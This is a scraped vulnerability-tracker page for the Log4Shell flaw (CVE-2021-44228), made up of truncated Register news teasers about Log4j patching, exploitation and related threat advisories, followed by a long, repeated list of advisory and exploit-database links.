One of the biggest beasts in the password management world, LastPass, is being spun out from parent LogMeIn as a "standalone cloud security" organisation. "The success we've seen across the entire LogMeIn portfolio over the last 18 months proves there is a vast growth opportunity ahead for both LastPass and LogMeIn," said Andrew Kowal, a partner at Francisco Partners. Francisco Partners, a private equity business, bought the bundle of remote access, collab and password manager tools – which a...

Apache takes off, nukes insecure feature at the heart of Log4j from orbit with v2.16
The Register • Gareth Corfield • 14 Dec 2021

Get our weekly newsletter Now open-source logging library's JNDI disabled entirely by default, message lookups removed

Last week, version 2.15 of the widely used open-source logging library Log4j was released to tackle a critical security hole, dubbed Log4Shell, which could be trivially abused by miscreants to hijack servers and apps over the internet. However, that release only partially closed the hole (CVE-2021-44228) by disabling by default one aspect of the Java library's exploitable functionality – JNDI message lookups. Now version 2.16 is out, and it disables all of JNDI support by default, and removes ...

Log4j RCE latest: In case you hadn't noticed, this is Really Very Bad, exploited in the wild, needs urgent patching
The Register • Gareth Corfield • 13 Dec 2021

Get our weekly newsletter This might be the bug that deserves the website, logo and book deal

Miscreants are wasting no time in using the widespread Log4j vulnerability to compromise systems, with waves and waves of live exploit attempts focused mainly – for now – on turning infected devices into cryptocurrency-mining botnet drones. Israel's Check Point said this morning it was seeing around 100 exploit attempts every minute, going into further detail in a blog post. Apache Log4j is an open-source logging utility written in Java that is used all over the world in many software packag...

Log4j RCE: Emergency patch issued to plug critical auth-free code execution hole in widely-used logging utility
The Register • Gareth Corfield • 10 Dec 2021

Get our weekly newsletter Prepare to have a very busy weekend of mitigating and patching

An unauthenticated remote code execution vulnerability in Apache's Log4j Java-based logging tool is being actively exploited, researchers have warned after it was used to execute code on Minecraft servers. Infosec firm Randori summarised the vuln in a blog post, saying: "Effectively, any scenario that allows a remote connection to supply arbitrary data that is written to log files by an application utilizing the Log4j library is susceptible to exploitation." Crafted proof-of-concept code snippet...

LockBit victims in the US alone paid over $90m in ransoms since 2020
The Register

Topics Security Off-Prem On-Prem Software Offbeat Special Features Vendor Voice Vendor Voice Resources As America, UK, Canada, Australia and friends share essential bible to detect and thwart infections

Seven nations today issued an alert, plus protection tips, about LockBit, the prolific ransomware-as-a-service gang. The group's affiliates remains a global scourge, costing US victims alone more than $90 million from roughly 1,700 attacks since 2020, we're told. The joint security advisory — issued by the US Cybersecurity and Infrastructure Security Agency (CISA), FBI, Multi-State Information Sharing and Analysis Center (MS-ISAC), and cybersecurity authorities in Australia, Canada, the UK, Ge...

China's APT40 gang is ready to attack vulns within hours or days of public release.
The Register

Topics Security Off-Prem On-Prem Software Offbeat Special Features Vendor Voice Vendor Voice Resources Lax patching and vulnerable small biz kit make life easy for Beijing's secret-stealers

Law enforcement agencies from eight nations, led by Australia, have issued an advisory that details the tradecraft used by China-aligned threat actor APT40 – aka Kryptonite Panda, GINGHAM TYPHOON, Leviathan and Bronze Mohawk – and found it prioritizes developing exploits for newly found vulnerabilities and can target them within hours. The advisory describes APT40 as a "state-sponsored cyber group" and the People's Republic of China (PRC) as that sponsor. The agencies that authored the advis...

Triton malware still a threat to energy sector, FBI warns
The Register • Jessica Lyons Hardcastle • 28 Mar 2022

Get our weekly newsletter Plus: Ransomware gangster sentenced, Dell patches more Log4j bugs, and cartoon apes gone bad

In Brief Triton malware remains a threat to the global energy sector, according to an FBI warning. Triton is the software nasty used in a 2017 cyber attack carried out by a Russian government-backed research institution against a Middle East petrochemical facility. The new FBI warning [PDF] came a day after the US Department of Justice unsealed a pair of indictments that detail alleged Russian government efforts to use supply chain attacks and malware in an attempt to compromise and control crit...

It’s time to fill those cloud security gaps
The Register

Topics Security Off-Prem On-Prem Software Offbeat Vendor Voice Vendor Voice Resources Here’s how Wiz can help

Sponsored Feature When software vulnerabilities and zero days moved up the enterprise worry list 15 years ago, nobody imagined the world would one day end up with a threat as perplexing as Log4Shell – a vulnerability in the Apache Log4j open source logging framework that's used in software on all major operating systems spanning everything from cloud services to PC games. In what might be called the happier days of the past, flaws were something that affected single applications and individual...

VMware Horizon platform pummeled by Log4j-fueled attacks
The Register • Jeff Burt • 30 Mar 2022

Get our weekly newsletter Miscreants deployed cryptominers, backdoors since late December, Sophos says

VMware's Horizon virtualization platform has become an ongoing target of attackers exploiting the high-profile Log4j flaw to install backdoors and cryptomining malware. In a report this week, cybersecurity firm Sophos wrote that VMware's virtual desktop and applications platform has been in the crosshairs since late December, with the largest wave of attacks beginning Jan. 19 and continuing well into March. Many of the attacks are designed to deploy cryptocurrency mining malware, Sophos research...

Mirai botnet loves exploiting your unpatched TP-Link routers, CISA warns
The Register

Topics Security Off-Prem On-Prem Software Offbeat Special Features Vendor Voice Vendor Voice Resources Oracle and Apache holes also on Uncle Sam's list of big bad abused bugs

The US government's Cybersecurity and Infrastructure Security Agency (CISA) is adding three more flaws to its list of known-exploited vulnerabilities, including one involving TP-Link routers that is being targeted by the operators of the notorious Mirai botnet. The other two placed on the list this week involve versions of Oracle's WebLogic Server software and the Apache Foundation's Log4j Java logging library. The command-injection flaw in TP-Link's Archer AX21 Wi-Fi 6 routers – tracked as CV...

Memory-safe languages so hot right now, agrees Lazarus Group as it slings DLang malware
The Register

Topics Security Off-Prem On-Prem Software Offbeat Special Features Vendor Voice Vendor Voice Resources Latest offensive cyber group to switch to atypical programming for payloads

Research into Lazarus Group's attacks using Log4Shell has revealed novel malware strains written in an atypical programming language. DLang is among the newer breed of memory-safe languages being endorsed by Western security agencies over the past few years, the same type of language that cyber criminals are switching to. At least three new DLang-based malware strains have been used in attacks on worldwide organizations spanning the manufacturing, agriculture, and physical security industries, C...

Five Eyes nations reveal 2021's fifteen most-exploited flaws
The Register • Jessica Lyons Hardcastle • 28 Apr 2022

Topics Security Off-Prem On-Prem Software Offbeat Vendor Voice Vendor Voice Resources Malicious cyber actors go after 2021's biggest misses, spend less time on the classics

Security flaws in Log4j, Microsoft Exchange, and Atlassian's workspace collaboration software were among the bugs most frequently exploited by "malicious cyber actors" in 2021 , according to a joint advisory by the Five Eyes nations' cybersecurity and law enforcement agencies. It's worth noting that 11 of the 15 flaws on the list were disclosed in 2021, as previous years' lists often found miscreants exploiting the older vulns for which patches had been available for years. Of course, the US Cyb...

References

CWE-20CWE-400CWE-502CWE-917https://access.redhat.com/errata/RHSA-2022:0296https://nvd.nist.govhttps://www.cisa.gov/uscert/ics/advisories/icsa-21-357-02https://www.rapid7.com/db/modules/auxiliary/scanner/http/log4shell_scanner/https://www.first.org/epsshttps://www.debian.org/security/2021/dsa-5022http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.htmlhttp://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.htmlhttp://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.htmlhttp://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.htmlhttp://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.htmlhttp://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.htmlhttp://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.htmlhttp://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.htmlhttp://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.htmlhttp://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.htmlhttp://seclists.org/fulldisclosure/2022/Dec/2http://seclists.org/fulldisclosure/2022/Jul/11http://seclists.org/fulldisclosure/2022/Mar/23http://www.openwall.com/lists/oss-security/2021/12/10/1http://www.openwall.com/lists/oss-security/2021/12/10/2http://www.openwall.com/lists/oss-security/2021/12/10/3http://www.openwall.com/lists/oss-security/2021/12/13/1http://www.openwall.com/lists/oss-security/2021/12/13/2http://www.openwall.com/lists/oss-security/2021/12/14/4http://www.openwall.com/lists/oss-security/2021/12/15/3https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdfhttps://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdfhttps://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdfhttps://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdfhttps://github.com/cisagov/log4j-affected-dbhttps://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.mdhttps://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228https://lists.debian.org/debian-lts-announce/2021/12/msg00007.htmlhttps://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/https://logging.apache.org/log4j/2.x/security.htmlhttps://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032https://security.netapp.com/advisory/ntap-20211210-0007/https://support.apple.com/kb/HT213189https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbdhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbdhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbdhttps://twitter.com/kurtseifried/status/1469345530182455296https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001https://www.debian.org/security/2021/dsa-5020https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.htmlhttps://www.kb.cert.org/vuls/id/930724https://www.nu11secur1ty.com/2021/12/cve-2021-44228.htmlhttps://www.oracle.com/security-alerts/alert-cve-2021-44228.htmlhttps://www.oracle.com/security-alerts/cpuapr2022.htmlhttps://www.oracle.com/security-alerts/cpujan2022.htmlhttp://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.htmlhttp://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.htmlhttp://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.htmlhttp://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.htmlhttp://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.htmlhttp://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.htmlhttp://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.htmlhttp://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.htmlhttp://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.htmlhttp://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.htmlhttp://seclists.org/fulldisclosure/2022/Dec/2http://seclists.org/fulldisclosure/2022/Jul/11http://seclists.org/fulldisclosure/2022/Mar/23http://www.openwall.com/lists/oss-security/2021/12/10/1http://www.openwall.com/lists/oss-security/2021/12/10/2http://www.openwall.com/lists/oss-security/2021/12/10/3http://www.openwall.com/lists/oss-security/2021/12/13/1http://www.openwall.com/lists/oss-security/2021/12/13/2http://www.openwall.com/lists/oss-security/2021/12/14/4http://www.openwall.com/lists/oss-security/2021/12/15/3https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdfhttps://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdfhttps://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdfhttps://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdfhttps://github.com/cisagov/log4j-affected-dbhttps://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.mdhttps://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228https://lists.debian.org/debian-lts-announce/2021/12/msg00007.htmlhttps://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/https://logging.apache.org/log4j/2.x/security.htmlhttps://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032https://security.netapp.com/advisory/ntap-20211210-0007/https://support.apple.com/kb/HT213189https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbdhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbdhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbdhttps://twitter.com/kurtseifried/status/1469345530182455296https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001https://www.debian.org/security/2021/dsa-5020https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.htmlhttps://www.kb.cert.org/vuls/id/930724https://www.nu11secur1ty.com/2021/12/cve-2021-44228.htmlhttps://www.oracle.com/security-alerts/alert-cve-2021-44228.htmlhttps://www.oracle.com/security-alerts/cpuapr2022.htmlhttps://www.oracle.com/security-alerts/cpujan2022.html